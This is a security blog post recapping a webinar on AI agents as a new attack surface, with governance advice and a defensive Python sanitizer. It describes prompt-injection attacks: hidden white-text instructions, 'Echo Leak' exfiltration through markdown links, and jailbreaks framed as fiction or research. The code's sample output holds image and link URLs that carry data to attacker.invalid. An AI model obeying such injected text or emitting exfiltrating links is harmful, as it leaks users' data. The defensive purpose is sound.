The era of "typing into a box" is over. For years, we viewed artificial intelligence as a digital assistant—a sophisticated autocomplete tool that waited for human input. But according to Martin Kraemer, KnowBe4’s CISO Advisor for Europe and the Middle East, that dynamic has shifted. We have moved from asking AI questions to giving AI jobs.
In a recent deep-dive webinar, Martin explored the transition from AI tools to AI agents. These agents don’t just suggest text; they read emails, query proprietary documents, book meetings, and even write code—often without a human watching every step.
"AI has really become our digital colleague," Martin notes. "And that is the unique angle we are looking at: the hybrid workforce where humans and AI agents work side by side."
As these agents integrate deeper into our workflows, they bring a new set of security challenges that traditional perimeters aren't equipped to handle. Here are the key takeaways from Martin’s session on securing AI adoption.
The Four Traits Your AI Agent Shares With Your Staff
To secure AI, we must first recognize that agents behave more like employees than software. Martin identified four traits that AI agents share with your human workforce:
- Access: Just like a human, an agent has credentials to access mailboxes, file shares, and code repositories.
- Judgment Calls: AI is non-deterministic. Ask it the same question twice, and you might get two different actions—much like a human colleague.
- Influence: Agents can be swayed by the information they consume, making them susceptible to a digital form of social engineering.
- Agency: They act on behalf of a user, often inheriting permissions that may exceed what is necessary for a specific task.
The "Confused Deputy": Why Agents Are Easier to Manipulate
The most striking difference between a human colleague and an AI agent is the lack of "gut feeling." A human might hesitate if a request feels "off," but an AI agent complies by default. This is the classic "confused deputy" problem: a component holding legitimate authority is tricked into exercising it on behalf of whoever controls its input.
Martin highlighted that 73% of production AI deployments have an exploitable prompt injection vulnerability, yet only 33% of organizations have deployed dedicated defenses. This gap leads to what security experts call "Shadow AI"—where employees use unsanctioned tools, or vendors enable AI features by default without IT’s knowledge.
"We spent 20 years teaching humans not to trust every email they read, and now we’ve just deployed AI agents that do exactly that," says Martin.
Social Engineering: Now for Machines
The webinar detailed how the classic "ingredients" of social engineering—authority, urgency, and trust—are being repurposed to target AI:
- Indirect Prompt Injection: Hiding malicious instructions in a document (using white text on a white background) that the agent is asked to summarize. The human never sees it, but the agent follows it.
- The Echo Leak: A vulnerability where an agent, while summarizing a benign email, is tricked into exfiltrating data via a markdown link to an attacker’s domain.
- Context Manipulation: "Jailbreaking" an agent by framing a harmful request as "research" or "fiction" to bypass safety guardrails.
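A defender-side control for the Echo Leak pattern above, as an added example that is not part of the webinar or of KnowBe4's tooling: before an agent's markdown output is rendered, remove images and defang links whose host is not on an allowlist, and record what was removed for detection. The allowlisted hosts and the sample agent output are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts the agent's rendered output may reference.
ALLOWED_HOSTS = {"example.com", "intranet.example.com"}

# Matches markdown images ![alt](url) and links [text](url "title").
# Group 1 is "!" for images, group 2 the label, group 3 the URL.
# Reference-style links and bare autolinks are out of scope here.
_MD_LINK = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def _host_allowed(url: str) -> bool:
    """True only for http(s) URLs whose host is an allowlisted domain
    or a subdomain of one. urlparse's hostname already discards userinfo,
    so 'https://intranet.example.com@attacker.invalid/' resolves to the
    attacker host and is rejected."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower()
    return host in ALLOWED_HOSTS or any(
        host.endswith("." + allowed) for allowed in ALLOWED_HOSTS
    )


def sanitize_agent_markdown(text: str):
    """Return (safe_text, findings). Images pointing off-allowlist are
    removed entirely, because a renderer fetches them without a click and
    any secret packed into the URL leaves with the request. Off-allowlist
    links keep their label but lose the URL. Each removal is logged so the
    SOC can alert on an agent that suddenly starts emitting such links."""
    findings = []

    def repl(match):
        is_image = match.group(1) == "!"
        label, url = match.group(2), match.group(3)
        if _host_allowed(url):
            return match.group(0)
        findings.append({"kind": "image" if is_image else "link", "url": url})
        if is_image:
            return f"[image removed: {label or 'untitled'}]"
        return f"{label} (external link removed)"

    return _MD_LINK.sub(repl, text), findings


# Constructed agent output: one legitimate intranet link, one image and
# one link that would carry summarized data to an attacker-controlled host.
SAMPLE = (
    "Summary: Q3 numbers attached, see [the report](https://intranet.example.com/q3).\n"
    "![status](https://attacker.invalid/p.png?d=Q3%20revenue%20is%20%2412M)\n"
    "More [here](http://attacker.invalid/x?d=secret)."
)
```

Running `sanitize_agent_markdown(SAMPLE)` keeps the intranet link intact, replaces the image with `[image removed: status]`, and returns two findings whose URLs can be fed to detection tooling.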
How to Onboard Your AI Safely
Security shouldn't be about saying "no"—it should be about "Yes, and here is how." Martin suggests a governance framework based on three categories: Sanctioned (Enterprise-grade with SSO), Guided (limited use cases), and Prohibited (consumer tools that train on your data).
To achieve "zero invisible AI risk," organizations should follow these steps:
- Create an Inventory: You cannot protect what you don't know exists. List every tool, agent, and integration.
- Apply "Least Privilege" by Task: Don't let an agent inherit a user's entire role; limit its access to the specific task at hand.
- Prompt Hygiene Training: Just as we train for phishing, we must train for prompt safety.
- Human-in-the-Loop: For sensitive actions, ensure a human is required to verify the agent's output.
Get the Full Picture
The webinar also featured a first look at KnowBe4’s Agent Risk Manager, a new tool designed to surface "Shadow AI" signals and detect risky agent behaviors like sensitive info disclosure and unbounded consumption.
Are you ready to start "onboarding" your AI agents with the same rigor you use for human hires? This session is a must-watch for any security leader navigating the "Wild West" of AI adoption.
Watch the full webinar here to see the live demos and learn how to close the gap between AI productivity and organizational security.
